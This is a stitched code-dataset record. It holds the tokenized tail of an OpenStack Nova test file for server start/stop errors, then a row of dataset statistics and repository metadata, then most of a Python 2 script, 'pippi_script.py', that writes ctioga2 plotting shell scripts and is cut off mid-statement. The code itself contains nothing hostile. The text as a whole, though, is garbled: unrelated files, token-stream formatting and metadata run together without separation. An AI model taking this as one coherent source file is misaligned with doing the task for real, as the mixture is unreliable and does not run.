name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_stop_server'
op|','
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
string|"'is locked'"
op|','
name|'six'
op|'.'
name|'text_type'
op|'('
name|'ex'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_stop_invalid_state
dedent|''
name|'def'
name|'test_stop_invalid_state'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'fake_instance_get'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'stop'"
op|','
name|'fake_start_stop_invalid_state'
op|')'
newline|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'start'
op|'='
string|'""'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_stop_server'
op|','
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_start_with_bogus_id
dedent|''
name|'def'
name|'test_start_with_bogus_id'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'start'
op|'='
string|'""'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPNotFound'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_start_server'
op|','
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_stop_with_bogus_id
dedent|''
name|'def'
name|'test_stop_with_bogus_id'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'stop'
op|'='
string|'""'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPNotFound'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_stop_server'
op|','
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
| 12.325792 | 88 | 0.60952 | 2,453 | 16,344 | 3.949857 | 0.071341 | 0.201878 | 0.085664 | 0.098256 | 0.853339 | 0.830839 | 0.799257 | 0.735576 | 0.71865 | 0.686139 | 0 | 0.001422 | 0.096366 | 16,344 | 1,325 | 89 | 12.335094 | 0.654614 | 0 | 0 | 0.940377 | 0 | 0 | 0.358725 | 0.053965 | 0 | 0 | 0 | 0 | 0.010566 | 0 | null | null | 0 | 0.009057 | null | null | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
ff3b1827b738fe5764e1717591fd89a6f63efa9f | 86,263 | py | Python | pippi_script.py | patscott/pippi | 4818fa11abe6c9b0b62f6e31036ff975eb120bca | [
"Unlicense"
] | 10 | 2015-09-08T15:38:20.000Z | 2019-04-29T12:46:37.000Z | pippi_script.py | patscott/pippi | 4818fa11abe6c9b0b62f6e31036ff975eb120bca | [
"Unlicense"
] | 7 | 2016-11-18T13:28:24.000Z | 2021-07-01T01:43:23.000Z | pippi_script.py | patscott/pippi | 4818fa11abe6c9b0b62f6e31036ff975eb120bca | [
"Unlicense"
] | 3 | 2019-07-18T04:06:47.000Z | 2021-08-01T10:43:05.000Z |
#############################################################
# pippi: parse it, plot it
# ------------------------
# Program for creating plotting scripts for pippi.
#
# Author: Pat Scott (patscott@physics.mcgill.ca)
# Originally developed: March 2012
#############################################################
left_margin = 0.16
right_margin = 0.03
top_margin = 0.05
bottom_margin = 0.16
plot_scale = 1.1
import subprocess
import os
from pippi_utils import *
from pippi_read import *
#Define pip file entries required from parsing
parsedir = dataObject('parse_dir',safe_string)
# Define script-specific pip file entries
scriptdir = dataObject('script_dir',safe_string)
doComparison = dataObject('plot_comparison',boolean)
postMeanOnPost = dataObject('plot_posterior_mean_on_posterior_pdf',boolean)
postMeanOnProf = dataObject('plot_posterior_mean_on_profile_like',boolean)
bestFitOnPost = dataObject('plot_best_fit_on_posterior_pdf',boolean)
bestFitOnProf = dataObject('plot_best_fit_on_profile_like',boolean)
doLegend1D = dataObject('legend_on_1D',int_list)
doLegend2D = dataObject('legend_on_2D',intuple_list)
legendLoc1D = dataObject('legend_locations_1D',string_dictionary)
legendLoc2D = dataObject('legend_locations_2D',int_pair_string_dictionary)
doKey1D = dataObject('key_on_1D',int_list)
doKey2D = dataObject('key_on_2D',intuple_list)
keyLoc1D = dataObject('key_locations_1D',string_dictionary)
keyLoc2D = dataObject('key_locations_2D',int_pair_string_dictionary)
doColourbar = dataObject('plot_colourbar_2D',intuple_list)
doHistograms = dataObject('plot_as_histograms_1D',boolean)
legendLines = dataObject('extra_legend_lines',string_list)
plotSize = dataObject('plot_size',string)
blame = dataObject('blame',string)
logoFile = dataObject('logo_file',string)
logoLoc = dataObject('logo_loc',floatuple_list)
logoWidth = dataObject('logo_width',floater)
colours = dataObject('colour_scheme',internal)
axisRanges = dataObject('axis_ranges',floatuple_dictionary)
yAxisAngle = dataObject('yaxis_number_angle',floater)
refPoint = dataObject('reference_point',float_dictionary)
refKey = dataObject('reference_text',string)
keys = keys+[scriptdir,doComparison,postMeanOnPost,postMeanOnProf,bestFitOnPost,
bestFitOnProf,doColourbar,doLegend1D,doLegend2D,legendLoc1D,legendLoc2D,
doHistograms,legendLines,blame,colours,axisRanges,yAxisAngle,refPoint,
refKey,doKey1D,doKey2D,keyLoc1D,keyLoc2D,parsedir,logoFile,logoLoc,logoWidth]
# Define pip file entries to be read from savedkeys file
labels = dataObject('quantity_labels',string_dictionary)
dataRanges = dataObject('data_ranges',floatuple_dictionary)
lookupKeys = dataObject('lookup_keys',int_dictionary)
# Constants
blameFractionalVerticalOffset = 1.2e-2
PosteriorIsMainInComboPlot = True
likeColourbarString = 'Profile likelihood ratio $\Lambda=\mathcal{L}/\mathcal{L}_\mathrm{max}$'
postColourbarString = 'Relative probability $P/P_\mathrm{max}$'
defaultLegendLocation = 'bl'
defaultKeyLocation = 'tr'
defaultRefKey = 'Ref.\ point'
keyYSep = 0.055
keyXSep = 0.04
keyYVals = {'t':[0.94 - x*keyYSep for x in range(3)], 'c':[0.44 + x*keyYSep for x in range(3)], 'b':[0.065 + x*keyYSep for x in range(3)]}
keyXVals = {'r':[0.74 + x*keyXSep for x in range(2)], 'c':[0.45 + x*keyXSep for x in range(2)], 'l':[0.06 + x*keyXSep for x in range(2)]}
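# Worked example of the key placement scheme (values follow from the constants above):
# a key location string like 'tr' (top, right) indexes keyYVals['t'] = [0.94, 0.885, 0.83]
# and keyXVals['r'] = [0.74, 0.78]; these fractions are later rescaled into data
# coordinates as ytrema[0] + fraction*yRange and xtrema[0] + fraction*xRange.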
def script(filename):
# input: filename = the name of the pip file
print
# Parse pip file
getIniData(filename,keys)
# Make sure that comparison is turned off if comparison filename is missing
if doComparison.value and secChain.value is None:
print ' Warning: comparison curves requested but no comparison file specified.\n Skipping comparison...\n'
doComparison.value = False
# Work out where the parse output is located
if parsedir.value is None:
# No parse_dir; default to searching the directory containing chain(s)
parseFiledir = re.sub(r'/.*?$', '/', mainChain.value)
else:
# Search in parse_dir
parseFiledir = parsedir.value+'/'
# Work out where the script output is to be located
if scriptdir.value is None:
# No script_dir; default to parse directory
baseFiledir = parseFiledir
else:
# Save in script_dir
baseFiledir = scriptdir.value+'/'
# Make sure script_dir exists, make it if not
safe_dir(scriptdir.value)
# Work out how to reference the parse dir from the script dir
if parseFiledir[0] == '/' or parseFiledir[0] == '~':
# The parse output path is absolute; easy-peasy
parseFiledirFromScriptFiledir = parseFiledir
else:
# The parse output path is a relative one
if baseFiledir[0] == '/' or baseFiledir[0] == '~':
# The script output is to be placed in an absolute path; need to convert the parse path to absolute too
parseFiledirFromScriptFiledir = os.getcwd() + '/' + parseFiledir
else:
# The script output is also to be placed in a relative path
parseFiledirFromScriptFiledir = re.sub(r'.+?/', '../', baseFiledir+'/') + parseFiledir
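# Illustrative example (hypothetical paths): re.sub(r'.+?/', '../', ...) turns each
# directory component of the relative script path into '../', so baseFiledir = 'out/scripts'
# with parseFiledir = 'chains/' would give parseFiledirFromScriptFiledir = '../../chains/'.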
# Locate and scale logo (if any)
if logoFile.value is not None:
if logoFile.value == 'pippi': logoFile.value = sys.path[0]+'/pippi'
# Work out how to reference the logo file from the script dir
if logoFile.value[0] != '/':
if baseFiledir[0] == '/':
# The script output is to be placed in an absolute path; need to convert the logo path to absolute too
logoFile.value = os.getcwd() + '/' + logoFile.value
else:
# The script output is also to be placed in a relative path
logoFile.value = re.sub(r'.+?/', '../', baseFiledir+'/') + logoFile.value
# Strip extensions off chain filenames
baseFilename = baseFiledir + re.sub(r'.*/|\..?.?.?$', '', mainChain.value)
parseFilename = parseFiledir + re.sub(r'.*/|\..?.?.?$', '', mainChain.value)
parseFilenameFromScriptFiledir = parseFiledirFromScriptFiledir + re.sub(r'.*/|\..?.?.?$', '', mainChain.value)
if doComparison.value:
secParseFilename = parseFiledir + re.sub(r'.*/|\..?.?.?$', '', secChain.value) + '_comparison'
secParseFilenameFromScriptFiledir = parseFiledirFromScriptFiledir + re.sub(r'.*/|\..?.?.?$', '', secChain.value) + '_comparison'
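# Illustrative example (hypothetical filename): the regex r'.*/|\..?.?.?$' strips leading
# directories and a trailing extension of up to three characters, so a main chain of
# 'runs/scan1.txt' reduces to 'scan1' in the filenames constructed above.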
# Retrieve labels and data ranges saved in earlier parsing run
getIniData([parseFilename+'_savedkeys.pip'],[labels,dataRanges,lookupKeys])
#Work out whether to do posteriors and check that flags match up
if doPosterior.value and not any(x in labels.value for x in permittedMults):
print ' Warning: do_posterior_pdf = T but no multiplicity in chain labels.\n Skipping posterior PDF...'
doPosterior.value = False
# set colour scheme if it is undefined
if colours.value is None: colours.value = basic
# Create 1D plotting scripts
if oneDplots.value is not None:
# Determine whether histograms are required or not
histString = '' if doHistograms.value is None or not doHistograms.value else 'hist'
# Loop over requested plots
for plot in oneDplots.value:
print ' Writing scripts for 1D plots of quantity ',plot
# Set up filenames
currentBase = baseFilename+'_'+str(plot)
currentParse = parseFilenameFromScriptFiledir+'_'+str(plot)
currentBaseMinimal = re.sub(r'.*/', '', currentBase)
if doComparison.value: currentSecParse = secParseFilenameFromScriptFiledir+'_'+str(plot)
# Get plot limits
xtrema = dictFallback(axisRanges,dataRanges,plot)
xRange = xtrema[1] - xtrema[0]
ytrema = [0.0,1.0]
yRange = 1.0
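# dictFallback presumably returns the user-specified axis_ranges entry for this quantity
# when present, otherwise the data ranges recorded at parse time; for 1D plots the
# y axis is always the unit interval.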
# Locate and scale logo (if any)
if logoFile.value is not None:
logoCoords = [xtrema[0]+logoLoc.value[0][0]*xRange,logoLoc.value[0][1]]
logoString = '\'\\includegraphics[width = '+str(logoWidth.value*8.8)+'cm]{'+logoFile.value+'}\''
# Determine reference point
if refPoint.value is not None and plot in refPoint.value:
plotRef = True
refString = ' --draw-marker '+str(refPoint.value[plot])+','+str(yRange*colours.value.referenceMarkerInnerScale/40.0)+' '+\
colours.value.referenceMarkerInner+' /color \''+colours.value.referenceMarkerInnerColour+\
'\' /scale '+str(colours.value.referenceMarkerInnerScale)+' \\\n'+\
' --draw-marker '+str(refPoint.value[plot])+','+str(yRange*colours.value.referenceMarkerOuterScale/40.0)+' '+\
colours.value.referenceMarkerOuter+' /color \''+colours.value.referenceMarkerOuterColour+\
'\' /scale '+str(colours.value.referenceMarkerOuterScale)+' \\\n'
else:
plotRef = False
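# The reference point is drawn as two overlaid markers (inner and outer style/colour);
# the y coordinate yRange*scale/40.0 keeps them just above the x axis, scaled with the
# marker size.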
# Determine plot size
if plotSize.value is None or plotSize.value == '':
plotSizeInternal = '11cm x 4in'
else:
plotSizeInternal = plotSize.value
# Make profile likelihood plotting scripts
if doProfile.value:
# Get contours
if contours1D.value is not None:
contourLevels = getContours(parseFilename,plot,'like')
# Determine keys
keyString = ''
if doKey1D.value is not None and plot in doKey1D.value:
# Get gross key location
try:
keyLoc = keyLoc1D.value[plot]
except (KeyError, TypeError):
keyLoc = defaultKeyLocation
# Get text to be used for reference point
refText = defaultRefKey if refKey.value is None else refKey.value
# Get x and y coordinates for 3 possible keys (for markers and text)
yVals = ytrema[0] + np.array(keyYVals[keyLoc[0]])*yRange
xVals = xtrema[0] + np.array(keyXVals[keyLoc[1]])*xRange
markers = []
# Get details of key for reference point
if plotRef: markers.append([colours.value.referenceMarkerOuter, colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterScale, refText, colours.value.referenceMarkerInner,
colours.value.referenceMarkerInnerColour, colours.value.referenceMarkerInnerScale/
colours.value.referenceMarkerOuterScale])
# Get details of key for posterior mean
if postMeanOnProf.value: markers.append([colours.value.mainPostMeanMarker, colours.value.mainPostMeanColour1D,
colours.value.mainPostMeanMarkerScale, 'Mean'])
# Get details of key for best fit
if bestFitOnProf.value: markers.append([colours.value.mainBestFitMarker, colours.value.mainBestFitColour1D,
colours.value.mainBestFitMarkerScale, 'Best fit'])
# Reverse vertical ordering if keys are to be placed at the top of the page, so as to fill from the top down
if keyLoc[0] == 't': markers.reverse()
# Construct ctioga2 command for each key
for i,key in enumerate(markers):
if key[0] == 'Bullet' or key[0] == 'BulletOpen': key[2] /= 1.5
if key[2] > 1.0: key[2] = 1.0
# Write the extra marker overlay for the reference point
if len(key) == 7: keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[4]+' /color \''+\
key[5]+'\' /scale '+str(key[6]*key[2])+'\\\n'
# Write the main marker
keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[0]+' /color \''+key[1]+'\' /scale '+str(key[2])+'\\\n'
# Write the key text
keyString += ' --draw-text '+str(xVals[1])+','+str(yVals[i])+' \''+key[3]+'\' /color \''+colours.value.keyTextColour1D
keyString += '\' /justification left /scale 0.75 /alignment center \\\n'
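# Illustrative expansion (hypothetical values): each key entry emits a marker/text pair
# such as
#   --draw-marker 120.0,0.885 Bullet /color 'Blue' /scale 0.8
#   --draw-text 124.0,0.885 'Best fit' /color 'Black' /justification left /scale 0.75 /alignment center
# preceded by an extra overlaid marker when the entry describes the reference point.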
# Open plotting shell script file for writing
outfile = smart_open(currentBase+'_like1D.bsh','w')
outfile.write('#!/usr/bin/env bash\n')
outfile.write('# This plot script created by pippi '+pippiVersion+' on '+datetime.datetime.now().strftime('%c')+'\n')
outfile.write('ctioga2\\\n')
outfile.write(' --name '+currentBaseMinimal+'_like1D')
outfile.write(' --plot-scale \''+str(plot_scale)+'\'\\\n')
outfile.write(' --page-size \''+plotSizeInternal+'\'\\\n')
outfile.write(' --frame-margins '+str(left_margin)+','
+str(right_margin)+','
+str(top_margin)+','
+str(bottom_margin)+'\\\n')
outfile.write(' --xrange '+str(xtrema[0])+':'+str(xtrema[1])+'\\\n')
outfile.write(' --yrange 0:1\\\n')
outfile.write(' --ylabel \'Profile likelihood ratio $\Lambda=\mathcal{L}/\mathcal{L}_\mathrm{max}$\' /shift 2.1\\\n')
outfile.write(' --xlabel \''+labels.value[plot]+'\'\\\n')
outfile.write(' --label-style x /scale 1.0 /shift 0.15 --label-style y /scale 1.0 /shift 0.15')
if yAxisAngle.value is not None: outfile.write(' /angle '+str(yAxisAngle.value))
outfile.write('\\\n')
if contours1D.value is not None:
for i, contour in enumerate(contourLevels):
outfile.write(' --draw-line '+str(xtrema[0])+','+contour+' '+str(xtrema[1])+','+contour+' /color \'Black\' '+
'/style Dashes /width '+str(float(colours.value.lineWidth1D)*0.5)+'\\\n')
outfile.write(' --draw-text '+str(xtrema[0]+0.045*(xtrema[1]-xtrema[0]))+','+str(float(contour)+0.005)+' \''+str(contours1D.value[i])+
'\%CL\' /color \'Black\' /scale 0.5 /justification left /alignment bottom\\\n')
if doComparison.value:
# Do everything for comparison chain
outfile.write(' --plot '+currentSecParse+'_like1D'+histString+'.ct2@1:2 /fill xaxis /fill-transparency '+colours.value.fillTransparency1D+
' /fill-color '+colours.value.comparisonProfColour1D+' /color '+colours.value.comparisonProfColour1D+
' /line-style '+colours.value.comparison1DLineStyle+' /line-width '+colours.value.lineWidth1D+'\\\n')
if bestFitOnProf.value and colours.value.comparisonBestFitMarker is not None:
# Get best-fit point and plot it
bestFit = getCentralVal(secParseFilename,plot,'like',lookupKeys)
outfile.write(' --draw-marker '+str(bestFit)+','+str(yRange*colours.value.comparisonBestFitMarkerScale/40.0)+' '+
colours.value.comparisonBestFitMarker+' /color \''+colours.value.comparisonBestFitColour+
'\' /scale '+str(colours.value.comparisonBestFitMarkerScale)+' \\\n')
if postMeanOnProf.value and colours.value.comparisonPostMeanMarker is not None:
# Get posterior mean and plot it
postMean = getCentralVal(secParseFilename,plot,'post',lookupKeys)
if not postMean: sys.exit('Error: plot_posterior_mean_on_profile_like = T but no multiplicity given!')
outfile.write(' --draw-marker '+str(postMean)+','+str(yRange*colours.value.comparisonPostMeanMarkerScale/40.0)+' '+
colours.value.comparisonPostMeanMarker+' /color \''+colours.value.comparisonPostMeanColour+
'\' /scale '+str(colours.value.comparisonPostMeanMarkerScale)+' \\\n')
outfile.write(' --plot '+currentParse+'_like1D'+histString+'.ct2@1:2 /fill xaxis /fill-transparency '+colours.value.fillTransparency1D+
' /fill-color '+colours.value.mainProfColour1D+' /color '+colours.value.mainProfColour1D+
' /line-style '+colours.value.main1DLineStyle+' /line-width '+colours.value.lineWidth1D+'\\\n')
if doLegend1D.value is not None and plot in doLegend1D.value:
# Write legend
try:
legendLocation = legendLoc1D.value[plot]
except (KeyError, TypeError):
legendLocation = defaultLegendLocation
outfile.write(' --legend-inside \''+legendLocation+'\' /scale 1.0 /vpadding 0.1\\\n')
if legendLines.value is not None:
for x in legendLines.value: outfile.write(' --legend-line \''+x+'\' /color \''+colours.value.legendTextColour1D+'\'\\\n')
outfile.write(' --legend-line \'Prof.~likelihood\' /color \''+colours.value.legendTextColour1D+'\'\\\n')
if bestFitOnProf.value:
# Get best-fit point and plot it
bestFit = getCentralVal(parseFilename,plot,'like',lookupKeys)
outfile.write(' --draw-marker '+str(bestFit)+','+str(yRange*colours.value.mainBestFitMarkerScale/40.0)+' '+
colours.value.mainBestFitMarker+' /color \''+colours.value.mainBestFitColour1D+
'\' /scale '+str(colours.value.mainBestFitMarkerScale)+' \\\n')
if postMeanOnProf.value:
# Get posterior mean and plot it
postMean = getCentralVal(parseFilename,plot,'post',lookupKeys)
if not postMean: sys.exit('Error: plot_posterior_mean_on_profile_like = T but no multiplicity given!')
outfile.write(' --draw-marker '+str(postMean)+','+str(yRange*colours.value.mainPostMeanMarkerScale/40.0)+' '+
colours.value.mainPostMeanMarker+' /color \''+colours.value.mainPostMeanColour1D+
'\' /scale '+str(colours.value.mainPostMeanMarkerScale)+' \\\n')
# Plot reference point
if plotRef: outfile.write(refString)
# Draw key
outfile.write(keyString)
# Write credits
if blame.value is not None:
blameYCoordinate = str(blameFractionalVerticalOffset * yRange + ytrema[1])
outfile.write(' --draw-text '+str(xtrema[1])+','+blameYCoordinate+' \''+blame.value+'\' /scale 0.5 /justification right\\\n')
# Add logo
if logoFile.value is not None:
outfile.write(' --draw-text '+str(logoCoords[0])+','+str(logoCoords[1])+' '+logoString+'\\\n')
# Set axis colours
for x in ['top', 'bottom', 'left', 'right']:
outfile.write(' --axis-style '+x+' /stroke_color \''+colours.value.axisColour1D+'\'\\\n')
outfile.close()
subprocess.call('chmod +x '+currentBase+'_like1D.bsh', shell=True)
# Make posterior pdf plotting scripts
if doPosterior.value:
# Get contours
if contours1D.value is not None:
mainContourLevels = getContours(parseFilename,plot,'post')
if doComparison.value: secContourLevels = getContours(secParseFilename,plot,'post')
# Determine keys
keyString = ''
if doKey1D.value is not None and plot in doKey1D.value:
# Get gross key location
try:
keyLoc = keyLoc1D.value[plot]
except (KeyError, TypeError):
keyLoc = defaultKeyLocation
# Get text to be used for reference point
refText = defaultRefKey if refKey.value is None else refKey.value
# Get x and y coordinates for 3 possible keys (for markers and text)
yVals = ytrema[0] + np.array(keyYVals[keyLoc[0]])*yRange
xVals = xtrema[0] + np.array(keyXVals[keyLoc[1]])*xRange
markers = []
# Get details of key for reference point
if plotRef: markers.append([colours.value.referenceMarkerOuter, colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterScale, refText, colours.value.referenceMarkerInner,
colours.value.referenceMarkerInnerColour, colours.value.referenceMarkerInnerScale/
colours.value.referenceMarkerOuterScale])
# Get details of key for posterior mean
if postMeanOnPost.value: markers.append([colours.value.mainPostMeanMarker, colours.value.mainPostMeanColour1D,
colours.value.mainPostMeanMarkerScale, 'Mean'])
# Get details of key for best fit
if bestFitOnPost.value: markers.append([colours.value.mainBestFitMarker, colours.value.mainBestFitColour1D,
colours.value.mainBestFitMarkerScale, 'Best fit'])
# Reverse vertical ordering if keys are to be placed at the top of the page, so as to fill from the top down
if keyLoc[0] == 't': markers.reverse()
# Construct ctioga2 command for each key
for i,key in enumerate(markers):
if key[0] == 'Bullet' or key[0] == 'BulletOpen': key[2] /= 1.5
if key[2] > 1.0: key[2] = 1.0
# Write the extra marker overlay for the reference point
if len(key) == 7: keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[4]+' /color \''+\
key[5]+'\' /scale '+str(key[6]*key[2])+'\\\n'
# Write the main marker
keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[0]+' /color \''+key[1]+'\' /scale '+str(key[2])+'\\\n'
# Write the key text
keyString += ' --draw-text '+str(xVals[1])+','+str(yVals[i])+' \''+key[3]+'\' /color \''+colours.value.keyTextColour1D
keyString += '\' /justification left /scale 0.75 /alignment center \\\n'
# Open plotting shell script file for writing
outfile = smart_open(currentBase+'_post1D.bsh','w')
outfile.write('#!/usr/bin/env bash\n')
outfile.write('# This plot script created by pippi '+pippiVersion+' on '+datetime.datetime.now().strftime('%c')+'\n')
outfile.write('ctioga2\\\n')
outfile.write(' --name '+currentBaseMinimal+'_post1D')
outfile.write(' --plot-scale \''+str(plot_scale)+'\'\\\n')
outfile.write(' --page-size \''+plotSizeInternal+'\'\\\n')
outfile.write(' --frame-margins '+str(left_margin)+','
+str(right_margin)+','
+str(top_margin)+','
+str(bottom_margin)+'\\\n')
outfile.write(' --xrange '+str(xtrema[0])+':'+str(xtrema[1])+'\\\n')
outfile.write(' --yrange 0:1\\\n')
outfile.write(' --ylabel \'Relative probability $P/P_\mathrm{max}$\' /shift 2.1\\\n')
outfile.write(' --xlabel \''+labels.value[plot]+'\'\\\n')
outfile.write(' --label-style x /scale 1.0 /shift 0.15 --label-style y /scale 1.0 /shift 0.15')
if yAxisAngle.value is not None: outfile.write(' /angle '+str(yAxisAngle.value))
outfile.write('\\\n')
if contours1D.value is not None:
for i, contour in enumerate(mainContourLevels):
outfile.write(' --draw-line '+str(xtrema[0])+','+contour+' '+str(xtrema[1])+','+contour+' /color \''+colours.value.mainPostColour1D+
'\' /style Dashes /width '+str(float(colours.value.lineWidth1D)*0.5)+'\\\n')
outfile.write(' --draw-text '+str(xtrema[0]+0.045*(xtrema[1]-xtrema[0]))+','+str(float(contour)+0.005)+' \''+str(contours1D.value[i])+
'\%CR\' /color \''+colours.value.mainPostColour1D+'\' /scale 0.5 /justification left /alignment bottom\\\n')
if doComparison.value:
# Do everything for comparison chain
if contours1D.value is not None:
for i, contour in enumerate(secContourLevels):
outfile.write(' --draw-line '+str(xtrema[0])+','+contour+' '+str(xtrema[1])+','+contour+' /color \''+colours.value.comparisonPostColour1D+
'\' /style Dashes /width '+str(float(colours.value.lineWidth1D)*0.5)+'\\\n')
outfile.write(' --draw-text '+str(xtrema[0]+0.045*(xtrema[1]-xtrema[0]))+','+str(float(contour)+0.005)+' \''+str(contours1D.value[i])+
'\%CR\' /color \''+colours.value.comparisonPostColour1D+'\' /scale 0.5 /justification left /alignment bottom\\\n')
outfile.write(' --plot '+currentSecParse+'_post1D'+histString+'.ct2@1:2 /fill xaxis /fill-transparency '+colours.value.fillTransparency1D+
' /fill-color '+colours.value.comparisonPostColour1D+' /color '+colours.value.comparisonPostColour1D+
' /line-style '+colours.value.comparison1DLineStyle+' /line-width '+colours.value.lineWidth1D+'\\\n')
if bestFitOnPost.value and colours.value.comparisonBestFitMarker is not None:
# Get best-fit point and plot it
bestFit = getCentralVal(secParseFilename,plot,'like',lookupKeys)
outfile.write(' --draw-marker '+str(bestFit)+','+str(yRange*colours.value.comparisonBestFitMarkerScale/40.0)+' '+
colours.value.comparisonBestFitMarker+' /color \''+colours.value.comparisonBestFitColour+
'\' /scale '+str(colours.value.comparisonBestFitMarkerScale)+' \\\n')
if postMeanOnPost.value and colours.value.comparisonPostMeanMarker is not None:
# Get posterior mean and plot it
postMean = getCentralVal(secParseFilename,plot,'post',lookupKeys)
if not postMean: sys.exit('Error: plot_posterior_mean_on_posterior_pdf = T but no multiplicity given!')
outfile.write(' --draw-marker '+str(postMean)+','+str(yRange*colours.value.comparisonPostMeanMarkerScale/40.0)+' '+
colours.value.comparisonPostMeanMarker+' /color \''+colours.value.comparisonPostMeanColour+
'\' /scale '+str(colours.value.comparisonPostMeanMarkerScale)+' \\\n')
outfile.write(' --plot '+currentParse+'_post1D'+histString+'.ct2@1:2 /fill xaxis /fill-transparency '+colours.value.fillTransparency1D+
' /fill-color '+colours.value.mainPostColour1D+' /color '+colours.value.mainPostColour1D+
' /line-style '+colours.value.main1DLineStyle+' /line-width '+colours.value.lineWidth1D+'\\\n')
if doLegend1D.value is not None and plot in doLegend1D.value:
# Write legend
try:
legendLocation = legendLoc1D.value[plot]
except (KeyError, TypeError):
legendLocation = defaultLegendLocation
outfile.write(' --legend-inside \''+legendLocation+'\' /scale 1.0 /vpadding 0.1\\\n')
if legendLines.value is not None:
for x in legendLines.value: outfile.write(' --legend-line \''+x+'\' /color \''+colours.value.legendTextColour1D+'\'\\\n')
outfile.write(' --legend-line \'Marg.~posterior\' /color \''+colours.value.legendTextColour1D+'\'\\\n')
if bestFitOnPost.value:
# Get best-fit point and plot it
bestFit = getCentralVal(parseFilename,plot,'like',lookupKeys)
outfile.write(' --draw-marker '+str(bestFit)+','+str(yRange*colours.value.mainBestFitMarkerScale/40.0)+' '+
colours.value.mainBestFitMarker+' /color \''+colours.value.mainBestFitColour1D+
'\' /scale '+str(colours.value.mainBestFitMarkerScale)+' \\\n')
if postMeanOnPost.value:
# Get posterior mean and plot it
postMean = getCentralVal(parseFilename,plot,'post',lookupKeys)
if not postMean: sys.exit('Error: plot_posterior_mean_on_posterior_pdf = T but no multiplicity given!')
outfile.write(' --draw-marker '+str(postMean)+','+str(yRange*colours.value.mainPostMeanMarkerScale/40.0)+' '+
colours.value.mainPostMeanMarker+' /color \''+colours.value.mainPostMeanColour1D+
'\' /scale '+str(colours.value.mainPostMeanMarkerScale)+' \\\n')
# Plot reference point
if plotRef: outfile.write(refString)
# Draw key
outfile.write(keyString)
# Write credits
if blame.value is not None:
blameYCoordinate = str(blameFractionalVerticalOffset * yRange + ytrema[1])
outfile.write(' --draw-text '+str(xtrema[1])+','+blameYCoordinate+' \''+blame.value+'\' /scale 0.5 /justification right\\\n')
# Add logo
if logoFile.value is not None:
outfile.write(' --draw-text '+str(logoCoords[0])+','+str(logoCoords[1])+' '+logoString+'\\\n')
# Set axis colours
for x in ['top', 'bottom', 'left', 'right']:
outfile.write(' --axis-style '+x+' /stroke_color \''+colours.value.axisColour1D+'\'\\\n')
outfile.close()
subprocess.call('chmod +x '+currentBase+'_post1D.bsh', shell=True)
# Make profile-posterior comparison plotting scripts
if doProfile.value and doPosterior.value:
bestFitData = [colours.value.mainBestFitMarker, colours.value.mainBestFitColour1D, colours.value.mainBestFitMarkerScale, colours.value.mainProfColour1D]
postMeanData = [colours.value.mainPostMeanMarker, colours.value.mainPostMeanColour1D, colours.value.mainPostMeanMarkerScale, colours.value.mainPostColour1D]
# Work out which is the main and which is the comparison
if PosteriorIsMainInComboPlot:
[main, sec] = ['post', 'like']
[mainData, secData] = [postMeanData, bestFitData]
else:
[main, sec] = ['like', 'post']
[mainData, secData] = [bestFitData, postMeanData]
# Get contours
if contours1D.value is not None:
mainContourLevels = getContours(parseFilename,plot,main)
secContourLevels = getContours(parseFilename,plot,sec)
# Determine keys
keyString = ''
if doKey1D.value is not None and plot in doKey1D.value:
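# This combined-plot key block appears to rely on keyLoc, refText, xVals and yVals as
# set in the profile/posterior key blocks above, which will have run here because the
# combo plot is only produced when both profile and posterior plotting are enabled.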
markers = []
# Get details of key for reference point
if plotRef: markers.append([colours.value.referenceMarkerOuter, colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterScale, refText, colours.value.referenceMarkerInner,
colours.value.referenceMarkerInnerColour, colours.value.referenceMarkerInnerScale/
